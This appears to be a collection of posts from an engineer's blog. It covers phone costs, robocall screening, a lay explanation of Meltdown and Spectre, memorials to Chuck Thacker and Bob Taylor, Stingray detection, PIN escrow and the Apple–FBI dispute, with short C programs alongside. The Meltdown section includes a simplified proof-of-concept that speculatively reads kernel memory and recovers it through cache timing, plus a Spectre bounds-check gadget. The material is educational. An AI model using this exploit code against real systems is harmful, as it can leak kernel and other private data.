Are iPhones expensive?

The most expensive iPhone is now $1449, for the 512 GB iPhone XS Max.  That is crazy … right?
I looked around and found some other interesting numbers.

  • The average replacement cycle for cell phones in the US in 2017 was 32 months.
  • The average cell phone bill in the US is now over $80/month.

I dusted off my multiplication skilz:  32 months times $80 is $2560, and $1449 divided by 32 is about $45 a month.
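If you like your arithmetic as code, here is the same back-of-the-envelope calculation as a tiny C program; the numbers are just the ones quoted above.

    #include <stdio.h>

    int main(void) {
        double phone = 1449.0;    /* 512 GB iPhone XS Max */
        double bill = 80.0;       /* average US monthly cell bill */
        double months = 32.0;     /* average replacement cycle */

        printf("service over one cycle: $%.0f\n", bill * months);
        printf("phone cost per month:   $%.2f\n", phone / months);
        return 0;
    }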
So who is making money on phones?  The answer is Verizon, AT&T, T-Mobile, Sprint…
iPhones are expensive compared to many perfectly serviceable phones, but they are not expensive compared to the service providers.
Phones are a competitive market.  I’ve owned both Apple and Android phones.  They are fine.  If you think iPhones are too expensive, don’t buy them.
My own solution to the “Apple products are too expensive” problem was to buy some Apple stock.  It has worked out well.

Telephone Captcha

Something called during dinner yesterday.  I hung up almost immediately, but commented to the family that it is getting harder to quickly identify recorded calls.
My 16-year-old Andrew remarked that I should ask for the answer to 1 plus 1.
He’s invented telephone captchas!  When you get a call and you can’t quite tell if it is a person, ask them a math question.  If you don’t get an immediate correct answer, hang up.
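For fun, here is a minimal sketch of Andrew’s idea in C.  A real screening gadget would speak the challenge and listen to the caller; this sketch just uses the terminal.

    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>

    int main(void) {
        srand((unsigned)time(NULL));
        int a = rand() % 9 + 1, b = rand() % 9 + 1;
        printf("What is %d plus %d? ", a, b);
        fflush(stdout);

        time_t start = time(NULL);
        int answer;
        if (scanf("%d", &answer) != 1 || answer != a + b
            || time(NULL) - start > 5) {   /* humans answer quickly */
            printf("Hanging up.\n");
            return 1;
        }
        printf("OK, you might be human.\n");
        return 0;
    }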
There’s a subset of robocallers with a recording that pauses in almost-human places and makes small talk around your expected answers.  I find this trend alarming and suspect it takes in lonely seniors pretty well.
Personally, I’ve gotten to where I don’t bother talking anymore.  If there is any sort of pause after my hello, or anything recorded or that I can’t interrupt, I just hang up.  As they get better, though, I’m going to use telephone captchas.

Meltdown and Spectre

The technically inclined can read the papers at Meltdown and Spectre, but I will try for a less technical explanation.
Processor chips are supposed to be able to run multiple programs at once, while keeping the data of each program secret from the others. There is a special privileged program, called the operating system kernel, that coordinates all the activity. The kernel is necessarily allowed to read the data of any user program.
This isolation between the data of different programs, and between the secret data of the kernel and that of all user programs, is done by something called virtual memory. VM gives each program the illusion of a private memory space while in fact all the programs are using bits of the underlying real memory in a way coordinated by the kernel.
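You can see virtual memory in action with a minimal sketch using POSIX fork().  Parent and child print the very same virtual address, yet see different values, because each has its own private mapping of real memory.

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/wait.h>
    #include <unistd.h>

    int value = 42;   /* same virtual address in parent and child */

    int main(void) {
        if (fork() == 0) {        /* child: private copy of all memory */
            value = 99;
            printf("child:  %p = %d\n", (void *)&value, value);
            exit(0);
        }
        wait(NULL);
        printf("parent: %p = %d\n", (void *)&value, value);  /* still 42 */
        return 0;
    }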
A user program simply does not have any way to ask for the contents of arbitrary real memory (and thus to read the secrets of other programs).  The memory of other programs is not present at all in the virtual memory of the attacker.
The relation between the user programs and the OS is a little different. For convenience, the kernel usually has the entire physical memory “mapped” in its own virtual address space, and the kernel’s virtual space is also present in the virtual space of every user program. This is not supposed to be a problem because the kernel part of the memory is marked “kernel use only” and that restriction is enforced by the hardware. If a user program tries to read kernel memory, the hardware says “nope!”.
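You can watch the hardware say “nope!” yourself.  This sketch assumes x86-64 Linux, where the upper half of the address space belongs to the kernel; the forbidden read arrives in the program as a SIGSEGV signal.

    #include <signal.h>
    #include <unistd.h>

    static void nope(int sig) {
        (void)sig;
        write(STDOUT_FILENO, "nope!\n", 6);  /* the fault arrives as SIGSEGV */
        _exit(1);
    }

    int main(void) {
        signal(SIGSEGV, nope);
        /* An address in the kernel half of the x86-64 address space.
           The exact value doesn't matter; it is marked kernel-only. */
        volatile char *kernel = (volatile char *)0xffff800000000000UL;
        char c = *kernel;   /* user-mode read of kernel memory: faults */
        (void)c;            /* never reached */
        return 0;
    }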
All this is just background.
Meltdown is a way for user programs to read kernel virtual memory, even though they are not supposed to be able to do it.
Spectre is a way for user programs to read the virtual memory of other user programs, even though they are not supposed to be able to do it.
Virtual memory is only one of the ways in which processors present a view that is different from the underlying reality. Another is the so-called “architecture”. Most PCs have an architecture called x86, due to Intel. AMD also makes chips with the x86 architecture. The architecture is the stuff that is visible to a program: instructions, registers, memory, and so forth. The general outline of a computer architecture is that of a central processing unit, containing registers and instructions, which talks to a memory unit, containing data. Neither part of that picture is really true anymore, and hasn’t been for 30 years.
Memory isn’t simply memory anymore! If you’ve looked inside a PC, you’ve seen those flat rulers with chips on them plugged in edgewise to the motherboard. Those are main memory. That part is true. The problem is that they are way too slow. It can take 60 to 100 nanoseconds to get data from main memory. In that time, the CPU can execute maybe 200–300 instructions. Something had to be done. Inside the CPU chip, there are smaller faster memories called cache. They automatically hold the most recently accessed and most frequently accessed data from memory. This works because programs tend to access the same stuff over and over and also to access nearby stuff.
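The cache effect is easy to measure on an x86 machine with the compiler’s timestamp and cache-flush intrinsics.  A sketch (the cycle counts will vary from machine to machine):

    #include <stdio.h>
    #include <stdlib.h>
    #include <x86intrin.h>   /* __rdtsc, _mm_clflush, _mm_mfence */

    int main(void) {
        volatile char *buf = malloc(64);
        unsigned long long start, cached, uncached;

        buf[0] = 1;                          /* touch it: now in cache */
        _mm_mfence();
        start = __rdtsc();
        (void)buf[0];                        /* read from cache */
        _mm_mfence();
        cached = __rdtsc() - start;

        _mm_clflush((const void *)buf);      /* evict the line */
        _mm_mfence();
        start = __rdtsc();
        (void)buf[0];                        /* read from main memory */
        _mm_mfence();
        uncached = __rdtsc() - start;

        printf("cached:   %llu cycles\n", cached);
        printf("uncached: %llu cycles\n", uncached);
        return 0;
    }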
CPUs aren’t just CPUs anymore! Executing a single instruction involves a 5–10 step process: fetching the instruction, decoding what it means, fetching the data it needs, maybe doing some complicated arithmetic, and storing the answer back where it goes. If CPUs did these things one at a time, they would be too slow, so the operations of many instructions are overlapped in a pipeline of work. It turns out that that is not nearly enough speedup, so many modern CPUs execute instructions “out of order”. They look ahead at instructions that are coming up and do as many as they can, even though earlier instructions have not finished. In order to avoid vast confusion, instructions are only allowed to finish in order, with “later” results being held in temporary storage until earlier instructions finish, even though all the work for the later instructions has already been done. Modern CPUs also engage in “speculative execution”, which means they actually guess at what instructions will need to be executed sometime in the future and do them right away. This happens because of IF THEN ELSE instructions in the program that could cause different instructions to execute. The CPU doesn’t really know which way the IF THEN ELSE (called a branch) will go, so it makes a very well educated guess.
Out of order and speculative execution are especially interesting due to those long memory delays. The CPU can be thinking about and running instructions several hundred instructions ahead of the “commit point”.
None of this violates the architectural rules. The program doesn’t see the results of instructions that were never supposed to execute, and can’t read memory it is not entitled to see…  Well, it turns out it can.
The trick of Meltdown allows a program to read kernel virtual memory even though that is forbidden. The Meltdown program, by some modest bluffing, tricks the CPU into speculatively executing a read from kernel memory and then using the result to choose which data to read from user memory.
The results of these reads are never reported to the user program, and in fact by the time the program logic gets to that point, the CPU knows the read would never have been executed anyway, so it doesn’t even produce the exception that would normally happen when a user program breaks the rules and tries to read kernel memory.
But… in the underlying physical machine, the microarchitecture, the reads from memory did happen, and that data was read into the caches we talked about earlier.

The user program can then measure how long it takes to read each location in the user memory and figure out that one of them is a lot faster than the others.  That one is the one that was already brought into cache by the read that was never supposed to happen.
In short, the CPU speculatively executes a forbidden instruction and leaves faint echoes in the timing of reading different memory locations, and those echoes permit the Meltdown attack to read, pretty quickly and reliably, secret data from the OS kernel.
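For the concretely minded, here is a heavily simplified sketch of the whole Meltdown sequence in C.  It assumes an unpatched x86-64 Linux machine; a real exploit needs much more care (exception suppression, retries, a kernel address actually worth reading), and the kernel address and timing threshold below are just placeholders.

    #include <setjmp.h>
    #include <signal.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <x86intrin.h>

    #define STRIDE 4096               /* one page per possible byte value */
    static uint8_t probe[256 * STRIDE];
    static sigjmp_buf bounce;

    static void handler(int sig) { (void)sig; siglongjmp(bounce, 1); }

    /* Time one load; a short time means "was already in the cache". */
    static uint64_t time_read(volatile uint8_t *p) {
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        return __rdtscp(&aux) - t0;
    }

    int main(void) {
        /* Placeholder: some kernel address holding a secret byte. */
        volatile uint8_t *kaddr = (volatile uint8_t *)0xffff800000000000UL;

        signal(SIGSEGV, handler);
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe[i * STRIDE]);   /* cold-start the probe array */

        if (sigsetjmp(bounce, 1) == 0) {
            /* Architecturally this faults.  Microarchitecturally, an
               out-of-order CPU may already have read the secret and
               used it as an index into the probe array. */
            uint8_t secret = *kaddr;
            (void)*(volatile uint8_t *)&probe[secret * STRIDE];
        }

        /* The fault "never happened", but one probe line may be hot. */
        for (int i = 0; i < 256; i++)
            if (time_read(&probe[i * STRIDE]) < 100)  /* threshold: a guess */
                printf("secret byte might be %d\n", i);
        return 0;
    }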
Spectre is even more subtle.  In Spectre, a user program can affect the behavior of a different user program by tricking the processor into speculatively executing a read whose address is under control of the attacker. The program being attacked would never do this normally, and doesn’t even find out about it, because all the speculative work is thrown away. However, in the underlying hardware, the read did happen and leaves some of those faint echoes in the form of detectably different timing of events that the attacker can measure.
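The heart of Spectre variant 1 is a bounds check that the CPU speculates past.  Here is a sketch of the vulnerable pattern in the victim’s code; this is the shape of the problem, not a working exploit.

    #include <stddef.h>
    #include <stdint.h>

    uint8_t array1[16];
    uint8_t array2[256 * 4096];
    size_t array1_size = 16;

    /* The victim's own code.  After the branch predictor has been
       trained with in-bounds values of x, the CPU speculatively runs
       the body for an attacker-chosen out-of-bounds x as well, and
       the second load leaves a secret-dependent line in the cache. */
    void victim(size_t x) {
        if (x < array1_size) {
            uint8_t secret = array1[x];
            (void)*(volatile uint8_t *)&array2[secret * 4096];
        }
    }

    int main(void) {
        victim(0);   /* an in-bounds call; the attack is in the training */
        return 0;
    }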
Spectre can work in at least two environments, but the important case affects web browsers.  Web browsers run programs downloaded from web sites that are written in a language called JavaScript.  These programs are known to be suspect, since really, one shouldn’t trust anything found on the internet.  JavaScript programs are run in a very constrained “sandbox” that they are not supposed to be able to get out of, nor are they supposed to be able to access data outside the sandbox.  Spectre allows a JavaScript program to read data outside the sandbox and potentially read passwords or other secret data stored elsewhere in the web browser.
None of this is new, unfortunately!  Processor chips have had the features that enable Meltdown and Spectre for over 20 years, and the problems went unnoticed.  Fortunately, Meltdown is relatively easy to fix in software, at some cost in performance, by patching the operating system.  If kernel memory is not mapped into user space, even with protections, then the user program cannot learn anything.  Spectre is harder to fix and at present seems to require individually patching every program you wish to protect.  And this is the good news!
This business of computers leaking information by subtle changes in timing that can be caused by and measured by an attacker is a kind of thing called a “Side Channel Attack” in the security business.  Unfortunately, there is no general way to protect against side channel attacks.  All that anyone knows how to do is to limit the rate at which the attacker can steal data.  That’s good if you are trying to prevent the theft of something big, like a digital movie, but it doesn’t really help if you are trying to prevent the theft of something small, like a password.
Already, in the month or so since Meltdown and Spectre came to light, we have additional problems, such as “Meltdown Plus”, which exploits a completely different microarchitectural mechanism.
It may be that the only thing to do is to have multiple small CPUs that are really quite independent, so you never, never run untrusted software on the main processor, but only in a private little machine that shares nothing.

Chuck Thacker

Chuck Thacker died yesterday, and the world is poorer for it.
Chuck won both the Draper prize and the Turing award. He’s been described as “an engineer’s engineer”, epitomizing Antoine de Saint-Exupéry’s remark that “Perfection is achieved not when there is nothing more to add, but when there is nothing left to take away.” He established a track record of simple, beautiful, and economical designs that is exceedingly rare.
Over the last day I’ve been struggling with how to explain Chuck to non-hardware engineers.  He could achieve amazing results with fewer components than anyone else, and yet, after the fact, mere mortals could understand what he had done.  But he also understood the physics and technologies very well, and knew just where to apply the unusual part or custom design to make the entire project coalesce into a coherent whole. If you are a software developer, think of Chuck as someone like Niklaus Wirth, who invented Pascal. If you are an aviation buff, think of Chuck as someone like Kelly Johnson, who designed the SR-71. Chuck really was at that level.
I had the privilege to work directly with Chuck on three different computer system designs.  I was a coauthor on several papers with Chuck and coinventor on a networking patent, so I suppose my Thacker number is 1.
I first met Chuck Thacker when I was a summer intern at Xerox PARC in 1977.  We both joined Digital Equipment’s Systems Research Center, working for Bob Taylor, in 1984.  At SRC, Chuck led the design for the Firefly multiprocessor workstation.  I wrote the console software for the 68010 version, and designed the single and dual MicroVAX CPU modules. I wanted to add sound I/O to the Firefly and Chuck helped me figure out how to do it by adding only three chips to the design for the display controller.
Later at SRC, Chuck launched the idea of the “Nameless Thing”, which was to be a liquid immersion cooled computer built around an ECL gate array running at 200 MHz.  I worked on the first level caches, to be built out of 1.2 nanosecond Gallium Arsenide static RAMs.  We had to rewrite the CAD tools to get sensible board layouts that could run at those speeds.
NT was never built because it was overtaken by the Digital Semiconductor Group’s design of the first Alpha processor. Chuck led a team of Digital research folks to build development systems for the Alpha chip.  The effort was credited with advancing Alpha’s time to market by about a year. At the time, Digital had a standard design for multiprocessor systems based on the “BI” bus.  The specification ran to over 300 pages.  Chuck was incredulous, and worked out a design for the Alpha Development Unit multiprocessor bus that was 19 pages long.  The Alpha EV-3 and EV-4 chips were very unusual in that they could be configured for either TTL signaling on the pins, or ECL signaling.  The ADU became an unrepentant ECL design.  Strict adherence to ECL transmission line signaling and a complete disregard for power consumption allowed for exceedingly fast yet low noise signaling.  Chuck designed the bus and the memory system.  If I remember correctly, he commissioned Gigabit Logic to build custom address line drivers so that the memory would meet timing.  Dave Conroy designed the CPU module, and I designed the I/O module.  I recall that SRC built the chassis and ordered cables for the 400 amps of -4.5 volts from a local welding shop.  They asked “what kind of welder needs 18 inch cables?”
I learned a tremendous amount from Chuck’s economy of design and from his ability to make hardware vs software tradeoffs to achieve simplicity.  I also learned that it was completely allowed to rewrite all the software tools to make them do what you want.
Chuck was a “flat rock engineer”, in his own words.  The reaction of such a person to a new project is to first rub two rocks together to make a flat working surface. He was a lifelong opponent of complexity, not only in hardware, but in software as well, remarking that unnecessarily complicated software was apt to collapse in a rubble of bits – a phrase I adopted as the title of this blog.
Chuck Thacker was unique, and I deeply mourn his passing.  Evidently he didn’t wish a memorial service, but I think the duty falls on all of us to edge our designs a little closer to simple, elegant, straightforward, and beautiful.

Bob Taylor

Robert W. Taylor died yesterday.  While working at ARPA, he funded the work that led to the Internet.  He managed the legendary Xerox PARC Computer Science Lab, where the Alto and the Ethernet were created. He won the National Academy of Engineering’s Draper Prize. You can read more about these things elsewhere.
Bob Taylor hired me, with my new PhD, into CSL.  Later, he hired me again, at the Digital Equipment Systems Research Center.  I learned not everything I know, but quite a lot of it, on his watch. Bob had the special genius of assembling groups of people who could invent the future.
At Xerox, the weekly group meetings were called Dealer, as in Dealer’s choice.  The speaker set the rules.  The culture was for the audience to do their level best to challenge the ideas.  Bob talked about civility, and about the necessity of “turning type one disagreements into type two disagreements”.  A type two disagreement is where each party understands and can explain the position of the other.
I was first exposed to CSL as a research intern while a graduate student. On either side of my office were Dave Gifford and Eric Schmidt. When I graduated, I turned down a couple of faculty appointments to stay at CSL. There was no place else that had the same concentration of talent and the freedom to build new things.  Both of those factors were the work of Taylor.  He felt his job was building the group and building the culture, then defending it from outside influence.
In 1984, corporate finally got the best of him and Taylor left to start the Systems Research Center at Digital Equipment.  I was number 24 to quit and follow him.  Against all odds, Taylor repeated his success and built another outstanding research group at Digital.  Occasionally, some dispute or other would arise, and folks would go complain to Bob.  He had a plaque on his wall “Men more frequently need to be reminded than informed.”  Bob would gently remind us of the rules of disagreement.
It’s not well known, but Taylor was from Texas and a little bit of the Lone Star State followed him around.  One time, Dave Conroy and I had succeeded in getting a telephone audio interface running on our lab-built Firefly multiprocessor workstations, and mentioned it on our way out to lunch.  When we got back, we found Taylor had dialed in and left us a 30 second recording.  Dave and I knew this had to be preserved, but the test program we had had no code to save the recording!  Eventually, we sent a kill signal to create a core dump file and fished the recording out of the debris.  Here’s Bob Taylor:

[audio recording]

Go Square!

I got a misaddressed email today, with a receipt for someone’s Square account.
At the bottom, there is a button “Not your receipt?”
When clicked, the page reads “Someone must have entered your email address” with an option to unlink it.  Easy and sensible.
This is by far the best design for handling a misdirected email I’ve encountered.

Wikileaks Bait

One of the interesting developments in the 2016 electoral cycle is the use of offensive cyberespionage.  Wikileaks is publishing internal email from the campaign of Hillary Clinton, with the publications timed to attempt to damage the campaign.
Maybe this is the work of Russian spies, with Wikileaks an unwitting stooge, maybe not, but the case is quite interesting.
What should a campaign organization, or corporation, or government agency do?  Their emails may be next.
One possibility is to salt the email stream with really tempting tidbits suggesting illegal, immoral, or unethical behavior, but also put these emails in escrow somewhere.  Then, when the tidbits come to light, you can derail the news cycle with a story about how your infosec team has pwned the leakers and trolled the media.
The technique will only work the first time, but even later, professional news organizations are not going to want to take the chance that their scoop is a plant.  That is how Dan Rather lost his job.
If the plants are subtly different, they could also be used to identify the leaker or access path.  (This was suggested in “The Hunt for Red October” by Tom Clancy, written in 1984, but the idea is surely older than that.)
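A toy version of the canary trap: derive one of several innocuous wording variants from each recipient’s name, so a leaked copy points back at its recipient.  The names and phrases here are made up.

    #include <stdio.h>

    /* Each recipient gets a subtly different wording, chosen by a
       hash of their name; a leaked copy identifies its recipient. */
    static unsigned hash(const char *s) {
        unsigned h = 5381;
        while (*s) h = h * 33 + (unsigned char)*s++;
        return h;
    }

    int main(void) {
        const char *variants[] = {
            "We will meet at 9:00 to review the plan.",
            "We will meet at 9:00 to go over the plan.",
            "We will meet at 9 am to review the plan.",
        };
        const char *recipients[] = { "alice", "bob", "carol" };
        for (int i = 0; i < 3; i++)
            printf("%s gets: %s\n", recipients[i],
                   variants[hash(recipients[i]) % 3]);
        return 0;
    }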
More on point, it should be obvious at this point that email is not secret, nor is any electronic gadget secure.  [[ How do you identify the spook? She’s the one with a mechanical watch, because she doesn’t carry a phone. ]]
Until we get secure systems, and I’m not holding my breath, conspirators really shouldn’t write anything down.  In the alternative, their evil plans must be buried in a sea of equally plausible alternatives.

Stingray countermeasures

A Stingray is a cell tower lookalike device.  It broadcasts its presence, and nearby phones connect to the Stingray thinking it is a legitimate tower.  The Stingray can then log each phone or act as a man in the middle to intercept call metadata, text messages, or even call contents.
There are a number of public databases of legitimate cell towers, for example http://opencellid.org.  Some databases are governmental, such as the FCC license database, while others are crowdsourced.
It should be possible to modify a phone to only connect to towers which are legitimate by checking the purported tower ID against a cached copy of the database for the local area.  A Stingray could, of course, use the ID of a real tower, but that would disrupt communications in the whole area. This might not prevent the Stingray from logging the presence of such a phone, since the Stingray could hear the protocol handshake with the legitimate tower.
It should also be possible for a phone to passively listen for tower broadcasts and to compare the tower ID against the database.  An unknown ID might be a new legitimate tower, or it might be a Stingray.
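A sketch of the whitelist check in C.  The data structure and the single table entry are hypothetical; a real implementation would load a local snapshot of a database like opencellid.org.

    #include <stddef.h>
    #include <stdio.h>
    #include <string.h>

    /* A cell is identified by network codes plus a cell ID. */
    struct tower { unsigned mcc, mnc, lac, cellid; };

    /* In a real device, a local snapshot of a public database. */
    static const struct tower known[] = {
        { 310, 260, 1234, 56789 },   /* made-up entry */
    };

    static int is_known(const struct tower *t) {
        for (size_t i = 0; i < sizeof known / sizeof known[0]; i++)
            if (memcmp(t, &known[i], sizeof *t) == 0)
                return 1;
        return 0;
    }

    int main(void) {
        struct tower heard = { 310, 260, 9999, 11111 };  /* from the radio */
        if (!is_known(&heard))
            printf("red light: unknown tower %u-%u-%u-%u\n",
                   heard.mcc, heard.mnc, heard.lac, heard.cellid);
        return 0;
    }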
It is likely quite difficult to get at and modify the low level radio software in a commercial smartphone, but there is a complete open source suite of cell infrastructure software at http://openbts.org.
That code could serve as a starting point for a software defined radio device for detecting and tracking Stingrays.  One could make a box with a red light on top which lights up when there is an unknown tower in the area.
In some areas, use of Stingray devices requires a warrant, but this is not universal.  The courts have also determined that use of location data from legitimate cell towers does not require a warrant.

PIN Escrow

The FBI has dropped their request to require Apple to write code to unlock the terrorist iPhone.  Supposedly a third party offered a way in.  Yesterday the FBI said they did get in, so they no longer need Apple’s help.
For those whose first instinct is to distrust the government, this looks like the Justice department realized they were going to lose in court and hastily discovered a way out. “Never mind”.  This preserves their option to try again later when public opinion and perhaps law would be more on their side.  I am a little reluctant to think Justice would outright lie to a federal judge, but it wouldn’t be the first time.
This morning on NPR there was a different sort of heartbreaking story.  A woman and her baby were murdered, and there might be evidence on the woman’s phone, but it can’t be unlocked.  So what to do?
My idea is “PIN Escrow”.  Everyone should have a letter written with a list of their accounts and online passwords, to be opened by someone in the event of death or disappearance.  Everyone should have a medical power of attorney and so forth as well, to give a family member or trusted friend the power to act for you in the event of a sudden disability.  Just add your smartphone PIN to the letter.
In the alternative, one could write an app that encrypts your PIN with the public key of an escrow service and sends it off.  This facility could even be built into the OS, with opt-in (or even opt-out, after a sufficient public debate), so it would automatically track changes.  The government could operate such a service, or it could be private.  There could be many such services.  Some could be offshore.  Some could use key-sharing for the private key, so PIN recovery could not be done in secret.
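As a sketch of the client side, libsodium’s sealed boxes do exactly this sort of encrypt-to-a-public-key.  The escrow service, its key handling, and the upload step are all assumptions here.

    #include <sodium.h>
    #include <stdio.h>

    int main(void) {
        if (sodium_init() < 0) return 1;

        /* The escrow service's keypair.  In reality only the public
           key would ship with the app; the private key would live in
           the service's offline hardware key module. */
        unsigned char pk[crypto_box_PUBLICKEYBYTES];
        unsigned char sk[crypto_box_SECRETKEYBYTES];
        crypto_box_keypair(pk, sk);

        const char *pin = "123456";
        unsigned char sealed[crypto_box_SEALBYTES + 6];

        /* Anyone can seal to the public key; only the holder of the
           private key (ideally split among several people) can open. */
        crypto_box_seal(sealed, (const unsigned char *)pin, 6, pk);

        /* ...the app would now send `sealed` off to the service... */
        printf("sealed PIN: %zu bytes\n", sizeof sealed);
        return 0;
    }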
Let’s leave it up to individuals whether they want someone to have the power to unlock their phone in the event of an emergency.
From a security perspective, a PIN escrow service would be a dangerous and attractive target, so such a thing would have to be well designed in order to be trustworthy.  It should be kept offline, with no network connection.  The private key should be in a hardware key module.  Several people would have to collude in order to unlock a key, and there ought to be hardware safeguards to prevent bulk PIN recovery.
This is not a general back door for government surveillance; it wouldn’t grant remote access to a phone.  It wouldn’t be useful for hacking into criminals’ or terrorists’ phones (if they are smart), but it might help in cases where the phone owner is the victim of tragedy or accident.
And if you change your mind about having your PIN escrowed?  Just change your PIN.

Apple v FBI

I’m beginning to build up a full head of steam.  The first step seems straightforward.  I’m going to write my congressman.  It may not have much effect, but if enough of us write, it might.
Here’s my letter to Massachusetts Senator Elizabeth Warren.  I’ll be sending similar letters to Sen. Ed Markey and Rep. Katherine Clark.
2016, March 16

The Honorable Elizabeth Warren
317 Hart Senate Office Building
Washington, DC 20510

Dear Senator Warren:

I write about the Apple FBI affair.  Please oppose any attempt by government to weaken the security and privacy of all Americans by demanding security “backdoors” in our technology or to require the conscription of Americans or American companies to weaken their own security.

First, regarding backdoors. I hold a PhD in Electrical Engineering and have worked with computer systems and computer security for over 40 years.  I am coauthor of the well-regarded book on E-commerce systems “Designing Systems for Internet Commerce.”  In other words, I know quite a lot about this area.  There is simply no way to create a backdoor that does not also reduce the security of the system for everyone.

Second, speaking as an ordinary citizen, I do not know how the courts will rule on the government’s request to use the All Writs Act to compel Apple to write software to unlock the San Bernardino iPhone, but my own view is that the constitution does not and should not allow it.

The government is being deliberately disingenuous when it claims this case is only about one terrorist’s phone. I have no sympathy for the killers, but the privacy and security of everyone is at risk should the government prevail.  Should that happen, I expect you to propose and support legislation that outlaws backdoors and forbids the conscription of individuals or companies into the government’s service.  This has happened before.  In 1980, Congress passed the Privacy Protection Act of 1980, which corrected the overreach of government in Zurcher v. Stanford Daily.

Sincerely yours,

Lawrence C. Stewart